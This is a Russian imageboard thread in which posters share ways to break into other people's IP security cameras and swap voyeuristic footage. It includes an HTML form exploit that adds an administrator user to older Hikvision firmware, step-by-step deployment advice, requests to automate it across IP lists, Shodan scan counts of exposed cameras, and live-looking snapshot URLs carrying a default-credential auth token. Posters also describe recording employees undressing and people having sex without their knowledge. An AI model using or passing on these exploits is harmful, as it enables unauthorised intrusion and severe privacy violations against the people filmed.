>>105129а зачем дилдак фоткать на телефон?
>>1051>>105148Умываться?
>>105135Этo камера ещё работает?
>>105152Работает, но какой-то пидор сбросил все параметры на дефолтные Другой вариант, что какой-то пидор изменил пароль админа и владельцу небыло других вариантов как сбросить всё
>>1051563й вариант - какой то пидор постит скрины и записи в тред, набегают школьники, и крысят камеры проебывая всю годноту
>>105157Не понимаю как пост скрина или запись может убить камеру? Он ведь не постит ип
>>105158типа через скрин нельзя ip узнать
<html> <body> <form action="http://ipadress/PSIA/Security/AAA/users" method="POST" enctype="text/plain"> <input type="hidden" name="<?xml version" value="'1.0' encoding='utf-8'?><User><id>2</id><userName>test2</userName><password>Qq123456789</password><Extensions><bondIp><ipAddress>0.0.0.0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" /> <input type="submit" value="Submit" /> </form> </body></html>Вот сплоит для добавления пользователя. Пашет только на старых версиях прошивок.Если ещё рабочий сплоит на перезагрузку камеры. Если надо выложу.
>>105161выкладывай
>>105161Напиши инструкцию куда этот код вписывать
>>105161ЛОЛ :))) Я уже испугался что кто-то выдал метод. Давайте школьники, пытайтесь добавить пользователеь этим сплойтом
>>105163в анус себе впиши пёс
>>105161пидор
>>105161давай на перезагрузку, я буду сейчас перезагружать вам все камеры
Подскажите какие книги почитать чтобы тоже стать хакером?
>>105178Уголовный кодекс
>>104532Анон, что за страна? город? Ни как не могу найти эту камеру, живая ещё?
>>105179а серьезно?
малолетние крысятнические ублюдки
>>105182Своим сообщением ты вызываешь дополнительный интерес.
>>105184мне похуй
модер пидр удаляет сообщения
>>105161И что это теперь подстановкой в блокнотике ip адресса в двуъ местах сможно камеры ломать?
>>105196Создаешь php или html файл пихаешь все туда, не забыв поменять IP , запускаешь скрипт. Проще всего скачать OpenServer и скинуть скрипт в папку domain/localhost.Запускаешь сервак . В браузере пишешь localhost/имяскрипта.php(html), если все сделано верное лицезрееш кнопку submit жмакаеш на нее и добавляется оператор. Сказу скажу что мало камер будут поддаватьcя этy уязвимость потому что она древняя (2013 год). Сплоит рабочий проверил у себя на работе на старой камере у которой прошивка не обнавлялась
>>105216Зря так подробно:3 этот сплоит работает на тех камерах где kika может скрин вытянуть? Или этот ещё древнее? так там серьёзно только в двух местах rhost воткнуть?
>>105216напиши уж тогда, чтобы она автоматом подставлял айпишники из текстового файлика и перебирала их, а то заёбищно переписывать его под каждый айпишник?
Палите уже как добавить юзера с правами, пока хакеры не набежали
Просканил всю Европу (то есть то что выдал шодан) И вот такая статистика кому интересно.В правой колонке число камер с которых смог сохронить скринMariaDB [sh]> select country_code, count(*) as c from sh inner join country_continent using (country_code) where httpErrorNo = 0 and continent_code = 'EU' group by country_code order by c desc; +--------------+------+| country_code | c |+--------------+------+| RU | 8240 || UA | 4115 || NL | 1958 || GB | 1869 || FR | 1598 || PL | 1520 || RO | 1474 || IT | 1465 || BG | 1357 || CZ | 1230 || ES | 804 || PT | 762 || TR | 746 || DE | 715 || LT | 601 || HU | 525 || BE | 475 || SK | 467 || DK | 443 || LV | 362 || SE | 332 || EE | 297 || MD | 293 || CH | 241 || AT | 217 || RS | 202 || IE | 180 || FI | 173 || BY | 153 || GR | 134 || NO | 133 || SI | 75 || AL | 59 || MK | 53 || IS | 38 || HR | 35 || MT | 33 || BA | 33 || LU | 20 || AD | 3 || GI | 3 || ME | 2 || FX | 2 || GG | 1 || MC | 1 |+--------------+------+
>>105282Ты какой запрос делал?
>>105287webs -goahead Но это для всех хиквижн которые я раньше брутил по дефолтными паролями. Для этой новой уезвимости походу только app-webs имеет смысл искать
>>105292Это что за камера? хиквижн или что-то другое?
>>105300>>105292А потом у них был анал и жили они долго и счастливо
>>105298ubnt помойму
>>105301Не удивлюсь если она его отстрапонила.))
>>105303как отсканил? какая уезвимост? подробнее
>>104004 (OP)1. Меняем порт на камере на нестандартный.2. Меняем дефолтные логин\пароль.3. Оставляем в роутере доступ только с необходимых ip, остальные блочим.4. Меняем на роутере дефолтные логин\пароль.Хикка отсасывает!
Мне вот инетересно. Поменял какой-то хуй все дефолтные пароли на камерах. А что владельцы? Забили на них? У них же тоже все доступы должны пойти по пизде? Первое что приходит на ум, это сбросить все к заводским настройкам, после чего эти камеры снова засветились бы. А этого почему-то не происходит. Почему, а?
>>105320
>>105321Это все очень странно.
>>105321Если сборсить настройки а камера подключена через вайфай, то всё, потерял её. Нужно подключиться по местной сети и переустроить
>>105331Ебать, иди проспись.
>>105336
>>105340
чую что-то интересное
Вот это камера была, пока какой-то евнух не сменил парольБлаго, я успел наделать записей, как все работницы переодеваются
>>105349Нихуя там не было интересного. Это какое-то кафе в подмосковье(я даже на гугл-улицах это место находил, но потом забыл).Дальше лифчиков они не раздевались там.Но если пароль сменили, то всё равно жаль.
>>105351почему они раздевались только до лифчиков? они после работы не моются что ли?
>>105351Это вообще Казахстан блять, там не только раздевались, но и молились регулярно
>>105354Видимо, не моются. Просто скидывали официантскую спецодежду и одевали гражданскую. Чучмеки, хуле.>>105355Не замечал, чтобы молились, а вот что переодевались все вперемешку - и бабы и мужики - это да. И никто друг друга не стеснялся. Но сиськи не показывали. ни наедине ни перед мужиками. Но ебать они страшные. Откуда берутся все эти эротические фантазии про азиаток, если даже официантки у них страшны как атомная война?
>>105356а что в них страшного кроме ебала?
>>105355>молилисьа какая у них религия?
Зачем вообще ставить камеру в раздевалку? Или это какой-нибудь охранник дрочер запрятал камеру где-нибудь в стене и её никто не замечает?
А вот я, может, и пизжу.Посмотрел те записи, которые делал и вроде помещение-то похоже, да не совсем. Гладилка там у них тоже есть
Как вы дымаете, зачем установлена это камера?
>>105362зачем?
>>105356Да все фапабельны были, кроме разве что жирухи в труханах-парашютахХотя, уверен, что кто-то из местных и на нее сладко передергивал
>>105360Не, это другое что-то
>>104004 (OP)
>>105366Запили видео из той раздевалки
>>105371
Есть регистратор, к нему не подключен диск для записи, можно ли как-то самому подключить диск для запис
https://t.me/joinchat/AAAAAEREfMIQ1-hQLt0f9A ссыль на конфу
https://t.me/joinchat/AAAAAEREfMIQ1-hQLt0f9A конфа...И распрастроните среди жельцов, как вы это любите....
>>105460как подключится через веб клиент?
А что за китайская порога за 28 баксов с камерами?
>>105459Что за конфач? Писать нельзя
>>105521Что за прога?
>>105539в новостяшках былоhttps://life.ru/t/%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8/1018942/kitaiskiie_khakiery_podghliadyvaiut_za_sotniami_polzovatieliei_chieriez_vieb-kamiery
чатик в настройках камеры
Аноны, скиньте пожалуйста, если кто ловил, шликающих тянок. Хотя бы скрины.
>>105300>>105292Ебать СУКА, вы че охуели??!! Это мои соседи!! ЕБАТЬ! Дайте IP срочно!
>>105586172.0.0.1
>>105614у первой камеры айпи подтер?
>>105621Да
http://213.133.178.224/Streaming/channels/1/picture/?auth=YWRtaW46
>>105623http://37.53.86.151/Streaming/channels/1/picture/?auth=YWRtaW46
>>105614охуенно, конечно, я бы обменялся с тобой, но у тебя скорее всего не будет желания, так?
>>105623>>105624нахуя ты это тут выложил? Ты ж не думаешь, что это гинекологические кресла, а?
>>105615Хороша была камера, всё там было)) Только вот я не понял, мужик белый вроде как я понял с женой своей в одной комнате был, а эта негритянка вроде как дочка его, мне так изначально казалось, судя по поведению и тд. Но херли он потом и её трахать начал? Значит не дочка?
>>105631Мужик белый, а дочка негритянка.Нормально же.Дочка.
>>105631>>105632та какая нахуй дочка. Там два разных мужика её потрахивали. Потом еще одна негритоска появилась и уже её чаще приходовали. Сложилось мнение, что негритоска просто жила там с оплатой сексом, студентка, мож. Иногда мужики пропадали надолго, более недели. Она тогда селфилась голая на телефон часто.
>>105634прикол. Это что такое вообще? Это посуточная хата или этот чел там постоянно? Бабы есть там?
>>105634В "Сам себе режиссер" отправит.
>>10563это дочка негритянки из другой комнаты. он ее трахать не так давно начал, до этого все взрослую ебал. один раз даже тройничок устроили. ооочень странная фигня ) камера мертва?
>>105638Давно уже.
>>105629Там просто анализы крови берут
Внимательно прочитайте что на плакате на стене написанно :)
>>105641>>105540LOL Уже понятно китайцы на своих камерах бакдоры поставили. А потом программы продают по 28 евро..
>>105636Есть бабы голые в бассейнах?
>>104463Четвертая камера адовая, такого я ни на одном порносайте не видел.
Анастасия
>>105646Реально продают и не только китайцы. цена одинаковая. Софт хз какой, но там фишка, что они обновления дают и сами палят камеры и дают адреса с явками\паролями. Достаточно старая тема, возможно уже прикрыли.
>>105648Шторы понравились?
>>105650Видимо не всё сломали, наблюдал эту камеру год назад.
>>105653в той комнате, где она закрывает камеру чем-то - там есть что-то стоящее?
>>105654Я коридор вспомнил больше, видимо закрывала остальное раз не сохранил себе в историю.
бдительный французский товарищ.
>>105657Я бы обосрался
Насканил я, значит, 30000 хостов в ДС. Запустил хикку, а она мне открыла 70 картинок. Что за хуйня, товарищи?
Тред достиг бамплимита, поэтому создал новый >>105689 (OP)
>>105686лей список.
>>104959>>104877>>104874>>104870>>104868>>105614Какой пароль там был?
>>104362>Причесал скриптик - и надо признать довольно лампово получилось.в>https://github.com/makaka-hacker/kikka>Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46>>>Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.>>Но:>1) часть снимков выходит битая - не только jpg качается>2) я хз как в баше потоки организовать - поэтому всего один>3) не windows :0 >4) Все равно надо добручивать - искать пасс от годной камеры>5) bash не айс для таких дел>>Добра анону, который в /b тред создал